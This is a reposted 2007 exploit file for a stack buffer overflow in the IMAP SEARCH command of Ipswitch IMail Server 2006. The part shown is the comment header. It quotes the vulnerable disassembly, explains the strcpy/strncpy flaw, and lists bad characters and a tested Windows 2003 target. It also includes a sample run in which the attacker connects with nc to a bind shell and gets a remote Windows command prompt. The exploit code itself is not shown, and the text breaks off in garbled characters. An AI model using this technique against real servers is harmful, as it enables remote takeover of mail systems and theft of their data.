Home / os / win10

ipswitch-overflow.txt

Posted on 26 July 2007

#!/use/bin/perl
#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
#
# Vuln Found by: Manuel Santamarina Suarez
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
#
# The Vuln code is here (imap4d32.exe version 6.8.8.1)
#  00418CCA  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
#  00418CD0  |.  0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
#  00418CD3  |.  83FA 22       |CMP EDX,22
#  00418CD6  |.  75 2A         |JNZ SHORT IMAP4D32.00418D02
#  00418CD8  |.  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418CDE  |.  50            |PUSH EAX                                ; /String
#  00418CDF  |.  FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; lstrlenA
#  00418CE5  |.  83E8 02       |SUB EAX,2
#  00418CE8  |.  50            |PUSH EAX                                ; /maxlen
#  00418CE9  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]         ; |
#  00418CEF  |.  83C1 01       |ADD ECX,1                               ; |
#  00418CF2  |.  51            |PUSH ECX                                ; |src
#  00418CF3  |.  8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54]           ; |
#  00418CF6  |.  52            |PUSH EDX                                ; |dest
#  00418CF7  |.  FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>]  ; strncpy
#  00418CFD  |.  83C4 0C       |ADD ESP,0C
#  00418D00  |.  EB 13         |JMP SHORT IMAP4D32.00418D15
#  00418D02  |>  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418D08  |.  50            |PUSH EAX                                ; /src
#  00418D09  |.  8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54]           ; |
#  00418D0C  |.  51            |PUSH ECX                                ; |dest
#  00418D0D  |.  E8 7E610100   |CALL <JMP.&MSVCR71.strcpy>              ; strcpy
#  00418D12  |.  83C4 08       |ADD ESP,8
#
#  The programmer has made an extreamly stupid mistake.
#  He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
#  else strncpy.
#  the buffer overflow takes place when the strcpy is called.
#  But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src));
#  So, whether the command was started with a '"' or not, the stack overflow will take place immediately.
#
#  Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
#  But others like "SEARCH BEFORE" command will also trigger the overflow.
#
#  NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
#
#  Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested On Windows 2003 SP1 CN
#
#  D:>perl imap.pl 192.168.226.128 143
#  * OK IMAP4 Server (IMail 9.10)
#  0 OK LOGIN completed
#  * FLAGS (Answered Flagged Deleted Seen Draft)
#  * 1 EXISTS
#  * 1 RECENT
#  * OK [UIDVALIDITY 1185337300] UIDs valid
#  * OK [UIDNEXT 485337302] Predicted next UID
#  2 OK [READ-WRITE] SELECT completed
#  -------------- [BEGIN] -------------------
#  ----------------  [END]  ------------------
#
#
#  D:>nc -vv -n 192.168.226.128 1154
#  (UNKNOWN) [192.168.226.128] 1154 (?) open
#  Microsoft Windows [°æ±¾ 5.2.3790]
#  (C) °æÃ

 

TOP